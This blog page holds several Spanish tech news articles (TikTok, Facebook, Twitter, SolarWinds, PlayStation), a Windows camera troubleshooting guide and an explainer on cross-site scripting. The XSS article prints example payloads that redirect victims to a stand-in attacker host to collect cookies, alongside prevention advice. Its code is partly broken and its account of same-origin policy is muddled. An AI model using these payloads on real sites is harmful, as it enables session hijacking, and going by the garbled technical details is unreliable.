TecnoLoco

Blog

  • TikTok ha elegido a 100 usuarios para su programa de creativos negros

    TikTok ha elegido a 100 usuarios para su programa de creativos negros

    Durante la segunda semana de enero, TikTok abrió aplicaciones para su programa de incubadoras destinadas a elevar y amplificar las voces de los creadores negros. Hoy, TikTok reveló qué usuarios han sido seleccionados para unirse.

    La clase inaugural del programa de creativos negros de TikTok

    TikTok ha anunciado que después de procesar más de 5000 aplicaciones, ha seleccionado a los 100 afortunados artistas que pueden unirse a su programa de incubadora de creadores de tres meses, TikTok for Black Creatives .

    "Estamos muy emocionados por la participación de la comunidad y continuaremos animando a todos los creadores y artistas que enviaron videos. Estamos entusiasmados con el programa TikTok para creativos negros y con el crecimiento y desarrollo de una comunidad creativa negra ya floreciente en TikTok. "

    El programa, presentado en colaboración con MACRO , está dedicado a ayudar a los creadores negros a expandir su marca y presencia en Internet , así como a conectarlos con nuevas oportunidades. Aunque tiene un nombre similar, no debe confundirse con el programa TikTok Creator Program , el acuerdo que detalla cómo TikTok paga a sus usuarios por el contenido que crean.

    Si bien TikTok no lanzó una lista completa de nombres al público, sí sabemos que se ha contactado a los 100 usuarios y que su contenido cubre una variedad de categorías: arte, entretenimiento, música, educación, comida, belleza y fitness.

    Relacionado: Cómo obtener más me gusta en TikTok si no eres famoso

    Entre los creadores elegidos se encuentran los músicos Keshawn Midgette y Grace DHaiti , los animadores Recokh y Marc Geiger , el panadero Robert Lucas y la entrenadora de bienestar Denise Francis . Otros usuarios utilizaron Twitter con entusiasmo para anunciar que habían sido seleccionados:

    ¿Qué es MACRO?

    Fundada por el CEO Charles D. King en 2015, MACRO es una empresa de medios multiplataforma que tiene como objetivo representar la voz y las perspectivas de las personas de color. La compañía ha producido una serie de películas notables, como Fences (2016), Just Mercy (2019) y, más recientemente, el drama histórico Judas y el Mesías Negro (2021).

    “Estamos encantados de asociarnos con TikTok para identificar, elevar y apoyar a los creadores negros. La comunidad de creadores negros en TikTok está a la vanguardia de impulsar la cultura y generar tendencias, y MACRO se enorgullece de ayudar a amplificar y mostrar su inmenso talento ", dice la directora de marca Stacey Walker King.

    TikTok continúa celebrando el mes de la historia afroamericana

    El programa comienza el 23 de febrero e incluye una presentación principal titulada "Manifestación | Visualiza tu futuro" por la actriz y empresaria Gabrielle Union.

    TikTok se jacta de que en los próximos tres meses del programa, su equipo estará acompañado por aún más personas influyentes negras para brindar información durante los ayuntamientos, foros y otros eventos educativos.

  • Facebook prueba más funciones para protegerse contra la explotación infantil

    Facebook prueba más funciones para protegerse contra la explotación infantil

    Facebook está probando nuevas herramientas diseñadas para combatir la explotación y el abuso infantil. La plataforma ahora proporcionará advertencias para los usuarios que busquen y publiquen contenido que explote a los niños.

    Facebook adopta una postura más dura sobre la explotación infantil

    En una publicación en la sala de prensa de Facebook , la plataforma declaró firmemente que "usar nuestras aplicaciones para dañar a los niños es aborrecible e inaceptable". Es por eso que la plataforma está probando dos nuevas funciones que previenen el abuso infantil en línea.

    La primera es una notificación de advertencia, que aparece cada vez que una persona usa Facebook para buscar términos relacionados con la explotación infantil. La notificación no solo advertirá al usuario de las posibles ramificaciones legales de esta búsqueda, sino que también incluirá un enlace a un programa de desvío de delincuentes.

    Facebook también está lanzando una segunda ventana emergente de advertencia que está dirigida a los usuarios que comparten contenido que explota a los niños. La notificación informará al usuario que el contenido que ha compartido es dañino y puede tener consecuencias legales. También establece que la cuenta del delincuente "puede estar desactivada" si comparte contenido de explotación nuevamente.

    Junto con la alerta de seguridad, Facebook eliminará el contenido de explotación, lo almacenará y luego lo informará al Centro Nacional para Niños Desaparecidos y Explotados (NCME). Facebook señala que está utilizando la "información de esta alerta de seguridad" para ayudar a la plataforma a "identificar señales de comportamiento de aquellos que podrían estar en riesgo de compartir este material", lo que ayudará a Facebook a desalentar este comportamiento en el futuro.

    Relacionado: Facebook comienza a verificar los mitos del cambio climático

    Facebook también ha actualizado sus políticas de seguridad infantil . Las reglas ahora dejan en claro que Facebook eliminará "los perfiles, páginas, grupos y cuentas de Instagram que se dedican a compartir imágenes de niños que de otra manera serían inocentes con subtítulos, hashtags o comentarios que contengan signos inapropiados de afecto o comentarios sobre los niños representados en la imagen". "

    Además, Facebook también facilita la denuncia de contenido de explotación. La plataforma ahora ofrece la opción "involucra a un niño" al informar una publicación inapropiada. Facebook afirma que estas publicaciones reportadas serán "priorizadas para su revisión".

    Las redes sociales aún necesitan mejores funciones de seguridad infantil

    Las redes sociales aún pueden ser un lugar peligroso para los niños. Por mucho que las principales plataformas sociales intenten proteger a los niños, no es inusual que los niños se metan en problemas.

    Dado que TikTok es una de las plataformas más populares entre la generación más joven, la plataforma (afortunadamente) ha ido en la dirección correcta en términos de seguridad infantil. Permite a los padres controlar la cuenta de sus hijos con Family Pairing y también hace que las cuentas de los niños pequeños sean privadas de forma predeterminada.

    Pero a pesar de esto, TikTok, y todas las demás plataformas sociales, todavía tienen margen de mejora.

  • Twitter relanza una función que insta a los usuarios a repensar las respuestas dañinas

    Twitter está relanzando una función de prueba que pide a los usuarios que reconsideren las respuestas groseras. Si intenta publicar una respuesta que contenga lenguaje dañino o grosero, Twitter mostrará una notificación que le solicitará que la revise.

    Mantener el contenido limpio en Twitter

    Twitter está tratando de hacer de la plataforma un lugar más agradable, todo con una sola notificación que le pide que cuestione una respuesta alimentada por la ira. La cuenta de soporte de Twitter anunció que la plataforma está devolviendo esta función experimental a los usuarios de iOS.

    Twitter inicialmente comenzó a probar esta notificación con un número selecto de usuarios en mayo de 2020, y luego implementó este experimento para los usuarios en todas las plataformas en agosto. La plataforma solo detuvo temporalmente la prueba para incorporar comentarios de los usuarios y mejorar la función.

    Ahora que la notificación está de vuelta, aquellos que tienen el hábito de publicar respuestas desagradables verán con frecuencia una notificación que dice: "¿Quieres revisar esto antes de tuitear? Estamos pidiendo a las personas que revisen las respuestas con lenguaje potencialmente dañino u ofensivo". El mensaje incluso señalará las palabras exactas dentro de la respuesta que Twitter encuentra ofensivas.

    Los usuarios tienen tres formas de responder al mensaje: Tweet , Edit y Delete . Si los usuarios quieren envenenar Twitterverse con contenido tóxico, pueden presionar Tweet . De lo contrario, pueden optar por limpiar el mensaje o eliminarlo por completo.

    Y, por supuesto, si Twitter marca incorrectamente un Tweet, los usuarios siempre pueden presionar el enlace que dice: ¿Nos equivocamos? para proporcionar comentarios. Tenga en cuenta que esta función actualmente solo se aplica a las respuestas, no a los Tweets reales.

    Desde el inicio de la primera prueba, la notificación ha sufrido un cambio de diseño. El mensaje ya no contiene Revisar , Eliminar y Enviar en una columna simple; se ha cambiado por una lista horizontal de opciones acompañada de un conjunto de iconos vibrantes.

    Esta no es la única vez que Twitter ha animado a los usuarios a empezar a pensar un poco más en sus Tweets. En septiembre de 2020, Twitter comenzó a presionar a los usuarios para que leyeran artículos antes de retwittearlos . Según los informes, la plataforma ha tenido éxito con esta función, lo que puede ser una buena señal para su advertencia de respuesta grosera.

    ¿Se convertirá Twitter en un entorno menos hostil?

    Seamos sinceros; Los argumentos en Twitter a menudo se salen de control. A medida que los insultos se lanzan a través de Twitterverse, los usuarios no enfrentan repercusiones a menos que haya una violación de los términos de servicio de Twitter. Si esta advertencia alguna vez se convierte en una característica permanente, es de esperar que pueda disuadir a los usuarios tóxicos de hacer comentarios de odio.

  • Cómo arreglar el código de error 0xa00f4244 sin cámara adjunta en Windows 10

    Cómo arreglar el código de error 0xa00f4244 sin cámara adjunta en Windows 10

    ¿Está intentando ejecutar la aplicación de la cámara en Windows 10 pero no puede?

    Tal vez se encuentre con el error 0xa00f4244 nocamerasareattached , o podría estar recibiendo el mensaje "no podemos encontrar su cámara". A veces, puede aparecer el mensaje de error "no hay cámaras conectadas".

    No te preocupes. Siga estos métodos probados para corregir el código de error 0xa00f4244 nocamerasareataddched e inicie su cámara de Windows una vez más.

    1. Verifique su programa antivirus

    Aunque es un salvavidas para todas las computadoras con Windows, se sabe que el programa antivirus causa problemas con la ejecución de otros programas ocasionalmente. Para asegurarse de que no sea el caso con la aplicación de su cámara, verifique la configuración de su antivirus y vea si está bloqueando la cámara.

    Incluso si todo está claro en la configuración, para asegurarse de que su antivirus no cause el problema, desactívelo temporalmente y luego vuelva a verificar su cámara.

    Relacionado: El mejor software antivirus gratuito

    2. Encienda la aplicación de la cámara

    A menudo, el código de error 0xa00f4244 nocamerasareatadched se produce cuando la aplicación Cámara de Windows está apagada. Para asegurarse de que este no sea el caso en su situación, presione la tecla de Windows + I para abrir el Configuración , luego seleccione Privacidad .

    Ahora, haga clic en la cámara, y alternar entre la activación si se establece como Desactivado.

    Si esta fue realmente la causa del código de error 0xa00f4244, se resolverá siguiendo los pasos anteriores.

    3. Analizar en busca de malware y virus

    Los ataques de virus y malware son perjudiciales para el buen funcionamiento de una computadora con Windows. Por cierto, se sabe que también causan problemas con los controladores de dispositivos y, por lo tanto, puede que no sea una mala idea escanear su PC en busca de tales vulnerabilidades.

    Para hacer eso, escanee su sistema a través de Windows Defender, una herramienta gratuita de Windows para eliminar malware y virus.

    Ve a Configuración> Actualización y seguridad . Desde allí, haga clic en Seguridad de Windows > Protección contra virus y amenazas .

    Ahora, haga clic en Opciones de escaneo , elija Escaneo sin conexión de Windows Defender y presione Escanear ahora.

    Windows 10 se reiniciará y se someterá a un análisis. Abra Windows Defender de la misma manera para verificar el informe. Si hubo algún problema, lo verá allí.

    Relacionado: Comprensión del malware: una guía para principiantes

    4. Verifique el controlador de la cámara

    Si los métodos anteriores no han funcionado hasta ahora, ahora tendrá que verificar el controlador de dispositivo de su cámara.

    Recuerde, un controlador de dispositivo es lo que le permite al hardware de su computadora comunicarse con su software. Por lo tanto, si hay algún problema con el controlador de su cámara, podría ser la causa del error 0xa00f4244 nocamerasareattached.

    Siga estos pasos para verificar el controlador de su cámara en Windows 10.

    1. Abra la aplicación Administrador de dispositivos desde la barra de búsqueda.
    2. Busque el icono de Cámaras.
    3. Haga clic con el botón derecho en la cámara de su dispositivo y haga clic en Actualizar controlador.
    4. Luego, seleccione Buscar controlador automáticamente.

    El Administrador de dispositivos buscará el controlador más actualizado disponible en su computadora.

    5. Restablezca la aplicación de la cámara

    Pruebe esto si ninguna de las soluciones anteriores ha funcionado hasta ahora. A veces, los problemas o cambios en la aplicación de la cámara durante un período de tiempo pueden conducir eventualmente al error 0xa00f4244 nocamerasareatched.

    Al realizar un simple restablecimiento de la configuración de su cámara, su cámara volverá a su estado original previamente modificado. Siga los pasos a continuación para comenzar:

    1. Haga clic en Configuración> Aplicaciones> Aplicaciones y funciones.

    2. Luego, haga clic en Cámara> Configuración avanzada.

    3. Ahora, haga clic en el botón Restablecer para restablecer la aplicación de su cámara.

    Esto resultará en un restablecimiento completo de todos los cambios realizados en la configuración de la cámara.

    6. Reinstale el controlador de la cámara

    Si el controlador de la cámara es la causa de que 0xa00f4244 no haya instalado ninguna cámara, entonces eliminarlo y reinstalarlo debería ser suficiente.

    Para hacer esto, presione la tecla de Windows + R , escriba devmgmt.msc y presione Enter . En el Administrador de dispositivos, expanda la sección Cámaras y haga clic en Desinstalar dispositivo.

    Una vez eliminado el controlador, reinicie su PC. En la próxima puesta en marcha, abra el Administrador de dispositivos y haga clic en Buscar cambios de hardware para instalar el controlador una vez más.

    Si la corrupción del controlador de su cámara fue realmente la causa del error 0xa00f4244 nocamerasareattached que enfrenta su PC, entonces este método funcionará.

    7. Reinicia tu PC

    Si ha intentado todos los trucos anteriores para evitar el error 0xa00f4244 nocamerasareatadched, y todos han fallado, entonces puede lanzar el último as en el hoyo para cada problema de Windows: un reinicio de Windows .

    Con el reinicio de Windows 10, puede decidir conservar todos sus archivos o eliminarlos para comenzar de nuevo. Para comenzar, vaya a la barra de búsqueda de Windows y escriba restablecer esta PC.

    Luego, haga clic en la opción Restablecer esta PC . En la siguiente ventana, haga clic en Comenzar.

    A continuación, obtendrá dos opciones para elegir. Puede seleccionar Conservar mis archivos o ir a Eliminar todo si está buscando un nuevo comienzo.

    En la siguiente pantalla, tendrá que elegir cómo desea reinstalar su Windows: a través de la nube o mediante una reinstalación local. La opción de nube descarga una nueva versión de Windows 10, mientras que la versión local usa una imagen de Windows 10 ya almacenada en su dispositivo.

    Tenga en cuenta que si está utilizando una computadora portátil, asegúrese de que esté conectada a un cargador. De lo contrario, no podrá continuar con el reinicio.

    Elija uno y haga clic en Siguiente para continuar con el restablecimiento. Puede llevar un tiempo configurar su PC para reiniciar. Después de eso, haga clic en Restablecer para finalmente comenzar el proceso.

    Error resuelto de Windows 10 0xa00f4244 nocamerasareattached

    La aplicación Windows 10 Camera es una utilidad esencial para la comunicación, especialmente en el mundo posterior a Covid, que ha hecho que trabajar desde casa sea una norma en lugar de un asunto de vez en cuando.

  • Microsoft, FireEye, CrowdStrike y SolarWinds hablan en la audiencia del Senado de los EE. UU. Sobre un ciberataque masivo

    El martes 23 de febrero se celebró la primera de una serie de audiencias relacionadas con el ciberataque SolarWinds. Durante la audiencia de tres horas frente al Senado de los Estados Unidos, hablaron representantes de Microsoft, CrowdStrike, FireEye y SolarWinds, con una ausencia notable: Amazon.

    Las audiencias también se llevaron a cabo en el contexto de la noticia de que el gobierno de los Estados Unidos está considerando sanciones contra el presunto autor del ataque, Rusia.

    El presidente de Microsoft testifica en la audiencia de SolarWinds

    La audiencia es el comienzo de los procedimientos para, en última instancia, averiguar el por qué y el para qué del ciberataque de SolarWinds.

    Hablando en la audiencia de SolarWinds:

    • Brad Smith, presidente de Microsoft
    • Kevin Mandia, director ejecutivo de FireEye
    • George Kurtz, presidente y director ejecutivo de CrowdStrike
    • Director ejecutivo de SolarWinds , Sudhakar Ramakrishna

    La gran pregunta que la mayoría de los senadores querían responder se refería al origen del ataque. El presidente de Microsoft, Brad Smith, dijo que "en esta etapa, hemos visto evidencia sustancial que apunta a la embajada extranjera de Rusia, y no hemos visto evidencia que apunte a nadie más".

    La opinión de Smith sobre el ataque fue corroborada de alguna manera por el presidente y director ejecutivo de CrowdStrike, George Kurtz, quien dijo que aunque no querían nombrar a un sospechoso de ser un actor de amenaza específico del estado-nación, la evidencia "era más consistente con el espionaje y los comportamientos que hemos visto. fuera de Rusia ".

    Brad Smith también señaló que Microsoft no cree que el ataque SolarWinds haya terminado. SolarWinds fue un truco de la cadena de suministro , que compromete a un proveedor externo en la cadena de suministro para obtener acceso al objetivo principal. De manera preocupante, Smith advirtió que Microsoft "continúa investigando, ya que no creemos que todos los vectores de la cadena de suministro se hayan descubierto o hecho públicos".

    El verdadero alcance del ataque puede tardar mucho más en emerger, ya que las empresas no están obligadas a revelar que fueron víctimas de dicho ataque. En eso, Brad Smith también dijo que "es imperativo para la nación que alentemos y, a veces, incluso requerimos un mejor intercambio de información sobre los ataques cibernéticos".

    Relacionado: Microsoft revela el objetivo real del ciberataque de SolarWinds

    Casa Blanca considerando sanciones contra el gobierno ruso

    Particularmente notables fueron los comentarios de la secretaria de prensa de la Casa Blanca, Jen Psaki, quien confirmó que la comunidad de inteligencia en general está trabajando para "afinar la atribución" del ataque SolarWinds a Rusia y que la atribución estaba a "semanas, no meses" de la confirmación. .

    Con un estimado de 18,000 agencias, empresas y organizaciones directamente afectadas por SolarWinds, no es de extrañar que la administración Biden esté considerando sanciones contra el gobierno ruso.

    Pero mientras el gobierno de EE. UU. Está considerando sanciones contra el presunto atacante, los funcionarios de EE. UU. Han dejado en claro que no pasará nada hasta que se confirme esa atribución. Como el ataque de SolarWinds fue tan impactante, después de haber permanecido fuera de la vista durante más de nueve meses, existe la sensación de que vale la pena esperar un poco más para garantizar la precisión.

  • Play At Home regresa a PlayStation 4 y PlayStation 5

    Play At Home regresa a PlayStation 4 y PlayStation 5

    Si es propietario de una PS4 o PS5, ¿sabía que la popular iniciativa Play At Home de Sony está regresando? Bueno, lo es, y trae consigo cuatro meses de contenido gratuito.

    Play At Home regresa en marzo

    Así es, según una publicación del blog de PlayStation.com , Play At Home regresa para una segunda ronda de contenido gratuito para aderezar tu PlayStation.

    A partir del 1 de marzo y hasta el 30 de junio, los propietarios de PS4 y PS5 pueden tener en sus manos un paquete de contenido sin gastar un centavo.

    En realidad, no necesita hacer mucho más que tener una cuenta activa de PlayStation Network para acceder a los juegos gratuitos. Por lo tanto, no se preocupe si no está registrado en PlayStation Plus o PS Now; no necesitas serlo.

    ¿Qué contenido gratuito obtienes con Play At Home?

    Actualmente, Sony solo ha anunciado dos obsequios. El primero es Ratchet and Klank de PS4, que estará disponible como descarga gratuita desde el 1 de marzo hasta el 31 de marzo. Puedes descargar el juego y una vez que termine la marcha, el juego será tuyo para siempre.

    La segunda oferta comienza el 25 de marzo y puede obtener acceso gratuito extendido a Funimation, el servicio de transmisión de anime.

    Relacionado: Crunchyroll vs.Funimation: ¿Cuál es el mejor servicio de transmisión de anime?

    Funimation es un servicio de transmisión que contiene muchas series de anime y películas para que las veas. Básicamente, está obteniendo un período de prueba extendido aquí, pero sigue siendo bastante bueno.

    Sony planea anunciar pronto más regalos gratuitos de Play At Home, así que mantén los ojos bien abiertos para más revelaciones importantes.

    ¿Sony ofrece algún otro contenido gratuito de PlayStation?

    Sí, Sony ofrece otro contenido gratuito, además de los juegos gratuitos o los servicios gratuitos que están disponibles en la tienda.

    Sin embargo, no esperes nada importante. Puede obtener temas, fondos, avatares y otros DLC gratuitos para PS4 y PS5.

    La propia PSN (PlayStation Network) también es gratuita, y con PSN puede acceder a una multitud de otros servicios como PlayStation Store. Con eso en mente, necesitará una cuenta de PSN para obtener los juegos gratuitos.

    Obtén tu contenido de Juego gratis en casa en marzo

    Entonces, ahora sabe cuándo puede esperar su contenido gratuito, solo es cuestión de esperar hasta el 1 de marzo, luego tiene cuatro meses de diversión por delante.

    Mientras tanto, siempre puede consultar qué más está disponible a través de PSN, el servicio en línea gratuito de PlayStation.

  • Cómo los piratas informáticos utilizan secuencias de comandos entre sitios para romper sitios web y robar datos

    Cómo los piratas informáticos utilizan secuencias de comandos entre sitios para romper sitios web y robar datos

    Las secuencias de comandos entre sitios o XSS pueden ser un ataque potente y rápido. Como desarrollador, incluso puede tomarlo por un error en su código y terminar buscando errores que no existen.

    Como cliente que usa el sitio web vulnerable, también puede divulgar inocentemente información vital sobre su acceso de autenticación al atacante.

    Entonces, ¿qué es la secuencia de comandos entre sitios? ¿Cómo pueden usarlo los piratas informáticos para ingresar a un sitio web y robar sus datos? ¿Y cómo se puede mitigar ese riesgo?

    ¿Qué es la secuencia de comandos entre sitios?

    La secuencia de comandos entre sitios o XSS ocurre si la secuencia de comandos de un sitio web malicioso interactúa con el código de uno vulnerable.

    Pero los servidores están conectados de tal manera que evitan que personas sin autenticación accedan y editen el código fuente de su sitio web.

    Internet utiliza la Política del mismo origen (SOP) para bloquear las interacciones entre sitios. Sin embargo, SOP comprueba tres lagunas de seguridad importantes e intenta mitigarlas. Son:

    • Política de protocolo de Internet que comprueba si ambos sitios web entregan contenido en SSL seguro (HTTPS) o en una URL insegura (HTTP).
    • La misma política de alojamiento web, que garantiza que aloja ambos sitios web en el mismo dominio.
    • La política de puertos que comprueba si ambos sitios web utilizan puntos finales de comunicación similares.

    SOP sostiene que si alguna de estas políticas es diferente para dos sitios web, no pueden leer ni intercambiar datos en la web.

    Pero JavaScript es un lenguaje manipulador que determina la capacidad de respuesta de un sitio web. Si bien es muy probable que el JavaScript de su sitio web esté en un archivo separado, también puede crear una etiqueta de secuencia de comandos y escribirla en su Modelo de objetos de documento (DOM).

    Por tanto, un atacante XSS podría pensar: "si puede escribir JavaScript en un DOM, en última instancia, puede ejecutarlo en cualquier editor de código o campo de entrada que acepte etiquetas HTML".

    Tal vulnerabilidad y probabilidad es lo que busca un atacante que usa XSS en un sitio web objetivo. Una vez que encuentran tal laguna jurídica, pueden pasar por alto el SOP.

    Relacionado: La hoja de trucos definitiva de JavaScript

    XSS, por lo tanto, es un ataque que utilizan los secuestradores para inyectar un script que realiza una acción maliciosa en un sitio web vulnerable. El script puede apuntar a formularios no protegidos o campos de entrada que aceptan datos.

    Cómo funciona y tipos de secuencias de comandos entre sitios, con ejemplos

    XSS puede ser una ejecución rápida de un script reflejado o temporal que un atacante coloca en formularios como campos de búsqueda. También puede ser molesto o persistente inyectado en la base de datos. O podría aparecer de forma pasiva después de la carga de una página.

    En algunos casos, este script también puede cambiar la entrada original de una víctima para desviar su intención. Un cambio persistente en las entradas de un usuario como este es un XSS mutante.

    En cualquier forma que se presente, el objetivo de un ataque XSS es robar los datos de una víctima a través de cookies y registros expuestos.

    Veamos una breve explicación de cada uno de estos tipos de ataques XSS y sus ejemplos para comprender cuáles son.

    ¿Qué es un XSS reflejado?

    Un XSS reflejado o temporal es una inyección directa de JavaScript en el campo de entrada de un usuario. Se dirige a solicitudes que obtienen datos de la base de datos, como resultados de búsqueda. Pero es un ataque de un solo cliente y objetivo.

    Durante un XSS reflejado, un atacante inserta un script en el término de búsqueda de una víctima objetivo. Dicho JavaScript puede ser un eco, una redirección o un recopilador de cookies.

    La secuencia de comandos inyectada en el campo de entrada de búsqueda se ejecuta tan pronto como un cliente de destino envía su consulta.

    Por ejemplo, durante la búsqueda de un usuario, un atacante podría insertar un JavaScript que se hace eco de un formulario, solicitando que la víctima ingrese su contraseña o nombre de usuario. Una vez que el usuario hace esto, podría terminar enviando sus credenciales sin saberlo a un atacante, pensando que es una solicitud del sitio original.

    A veces, el atacante también puede usar un script para redirigir a un usuario de la página vulnerable a su página. Allí, en la página del atacante, un usuario desprevenido puede ser engañado para que envíe algunos formularios, lo que lleva a la filtración de credenciales.

    Del mismo modo, si el objetivo es robar la sesión de un usuario, el atacante inyecta un script de recopilación de cookies en el término de búsqueda del usuario. Luego secuestran la sesión actual del usuario, roban información relevante y se hacen cargo de las actividades de la víctima.

    El siguiente ataque XSS de ejemplo roba la cookie de un usuario a través de una solicitud GET:

     http://vulnerablesite.com/?query=windows.location.replace("http://attackerswebpage.com/cookie-collector")

    En el ejemplo de XSS anterior, el atacante encuentra una laguna en el sitio web vulnerable. Entonces, cuando un usuario busca un recurso no disponible en el sitio vulnerable, lo redirige a la página del atacante. El atacante luego toca la cookie del usuario actual y toma su sesión.

    Sin embargo, esta vulnerabilidad es común cuando la acción de consulta de un sitio no se filtra para verificar las inyecciones de scripts a través de HTML.

    Pero incluso si hay una consulta filtrada, un atacante puede evitarlo recurriendo a medidas desesperadas como enviar enlaces a posibles usuarios en tiempo real de un sitio web. Pueden hacer esto utilizando cualquier forma de ingeniería social disponible para ellos.

    Relacionado: Qué hacer después de caer en un ataque de phishing

    Una vez que las víctimas hacen clic en dicho enlace, el secuestrador ahora puede ejecutar con éxito el ataque XSS y robar datos relevantes de la víctima.

    Las secuencias de comandos entre sitios persistentes o almacenadas

    El XSS almacenado presenta más amenazas. En este caso, un atacante almacena el script en la base de datos de un sitio web, lo que desencadena una ejecución persistente del script almacenado. El código almacenado puede ejecutarse al cargar la página o después de cargarla.

    A diferencia de la forma temporal de XSS, un XSS almacenado se dirige a toda la base de usuarios del sitio web vulnerable. Además de eso, también apunta a la integridad del sitio web afectado.

    Durante un XSS persistente, un atacante utiliza campos de entrada como formularios de comentarios para publicar el script en la base de datos de un sitio web.

    Pero, ¿qué pasa si protege los campos POST con tokens CSRF? Desafortunadamente, las secuencias de comandos de sitios cruzados almacenadas omiten las comprobaciones CSRF.

    Eso es porque el atacante envía un formulario como cualquier otro usuario del sitio web. Entonces, dicho formulario de comentarios envía el script a la base de datos como lo hace con todos los demás comentarios.

    Un ataque de este tipo puede ocurrir cuando los campos de entrada de un sitio web no utilizan los desinfectantes adecuados para escapar de los scripts y las etiquetas HTML.

    Imagine un usuario que publica el siguiente script mediante un formulario de comentarios web:

     <body onload = maLicious()>
     <script>
     function malCode(){
     window.location.replace("attackerswebpage URL");
     }
     </script>
     <body/>

    Cuando un atacante inserta un código como ese en la base de datos de un sitio web, sigue redireccionando a la víctima al sitio web del atacante cuando se carga la página. El script también podría ser una alerta, un cuadro modal interactivo o un anuncio malicioso incorporado.

    Debido a que la secuencia de comandos redirige al cargar la página, una víctima que no esté familiarizada con el sitio web vulnerable puede no darse cuenta de la redirección.

    Luego continúan interactuando con el sitio web del atacante. Sin embargo, el secuestrador puede utilizar varios medios para obtener información de las víctimas una vez que están en su página web.

    ¿Qué es un DOM o XSS pasivo?

    Un XSS basado en DOM ejecuta un código malicioso incrustado en el sitio web, lo que obliga a todo el DOM del lado del cliente a comportarse de manera inusual.

    Mientras que el XSS almacenado y reflejado se dirige a las solicitudes del lado del servidor en un sitio web, un XSS DOM se dirige a las actividades en tiempo de ejecución. Funciona insertando un script en el componente de un sitio web que realiza una tarea específica. Ese componente no ejecuta una acción del lado del servidor.

    Sin embargo, el script insertado en dicho componente cambia su intención por completo. Si este componente realiza una tarea relacionada con DOM, como las que cambian los elementos de un sitio web, el script puede forzar el cambio de toda la página web.

    En el peor de los casos, un XSS basado en DOM puede imitar un error. Eso es porque la página web se vuelve inusualmente reactiva.

    Cómo prevenir el ataque de secuencias de comandos entre sitios

    Una vulnerabilidad XSS proviene del uso inadecuado de las mejores prácticas de backend. Por lo tanto, la prevención de un ataque de secuencias de comandos entre sitios suele ser responsabilidad del desarrollador. Pero los usuarios también tienen un papel que desempeñar.

    El uso de un token CSFR para los campos de entrada no parece una solución a los ataques XSS. Y dado que este ataque también pasa por alto la Política del mismo origen, los desarrolladores deben tener cuidado de no omitir las prácticas de seguridad que impiden XSS.

    Las siguientes medidas preventivas son útiles para los desarrolladores.

    Desinfectar campos de entrada

    Para evitar XSS almacenado y temporal, debe usar desinfectantes eficientes para los campos de entrada. La desinfección de las consultas de búsqueda, por ejemplo, evita la inserción de etiquetas en los términos de búsqueda de los usuarios.

    Use Unicode y HTML Auto Escape

    Es útil utilizar el escape automático HTML y Unicode para evitar que los campos de entrada, como los formularios de comentarios y conversiones, acepten scripts y etiquetas HTML. El escape automático es una potente medida preventiva contra XSS almacenado o persistente.

    Filtrar etiquetas específicas hacia fuera

    Permitir a los usuarios insertar etiquetas en formularios de comentarios es una mala idea para cualquier sitio web. Es una brecha de seguridad. Sin embargo, si debe permitir eso, solo debe aceptar etiquetas que no presenten amenazas XSS.

    Utilice la validación de entrada adecuada

    Incluso si bloquea las etiquetas por completo, un atacante aún puede llevar a cabo un ataque XSS a través de medios sociales. Pueden enviar correos electrónicos en lugar de colocar cualquier cosa directamente en el sitio web vulnerable.

    Entonces, otro método para prevenirlo es validar las entradas de manera eficiente. Estas medidas incluyen validar protocolos y garantizar que su sitio web solo acepte entradas de HTTPS seguro y no de HTTP.

    El uso de bibliotecas de JavaScript dedicadas como dompurify también puede ayudar a bloquear las brechas de seguridad relacionadas con XSS.

    Puede utilizar herramientas como XSS Scanner o GEEKFLARE para buscar vulnerabilidades XSS en su sitio web.

    Cómo los usuarios pueden prevenir XSS

    En la actualidad, existen millones de sitios web en Internet. Por lo tanto, difícilmente puede saber cuál tiene problemas de seguridad XSS.

    Sin embargo, como usuario, debe asegurarse de estar familiarizado con cualquier servicio web antes de usarlo. Si una página web se vuelve repentinamente espeluznante o comienza a comportarse de manera inusual, esto puede ser una señal de alerta.

    Cualquiera que sea el caso, tenga cuidado de no revelar datos personales a un tercero que no sea de confianza. Luego, esté atento a los correos electrónicos no solicitados o publicaciones sospechosas en las redes sociales que puedan resultar en cualquier forma de ataques de phishing .

    Ningún método preventivo único se adapta a todos

    Hemos visto cómo se ve un ataque XSS y cómo prevenirlo. Es fácil olvidar los controles de seguridad XSS durante el desarrollo. Por lo tanto, los desarrolladores deben tomar medidas para garantizar que no se omita la protección. Sin embargo, una combinación de las medidas preventivas que enumeramos anteriormente funciona mejor.